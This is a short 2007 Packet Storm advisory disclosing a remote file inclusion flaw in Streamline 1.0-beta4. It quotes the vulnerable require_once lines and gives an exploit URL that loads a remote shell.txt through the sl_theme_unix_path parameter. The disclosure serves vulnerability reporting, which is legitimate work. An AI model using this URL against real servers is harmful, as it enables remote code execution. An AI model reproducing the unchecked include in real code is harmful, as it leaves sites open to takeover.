streamline-rfi.txt

2007-09-20T00:00:00
ID PACKETSTORM:59448
Type packetstorm
Reporter BiNgZa
Modified 2007-09-20T00:00:00

Description

                                        
                                            `Vulnerability Type: Remote File Inclusion  
Vulnerable file: /streamline-1.0-beta4/src/core/theme/includes/account_footer.php  
Exploit URL: http://localhost/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=http://localhost/shell.txt?  
Method: get  
Register_globals: On  
Vulnerable variable: sl_theme_unix_path  
Line number: 2  
Lines:  
  
----------------------------------------------  
<?  
require_once( $sl_theme_unix_path."/account/footer.php" );  
require_once( $sl_theme_unix_path."/common/footer.php" );  
  
----------------------------------------------  
  
GrEeTs To sHaDoW sEcUrItY TeAm & str0ke  
  
FoUnD By BiNgZa  
  
DoRk: :(  
  
shadowcrew@hotmail.co.uk  
  
`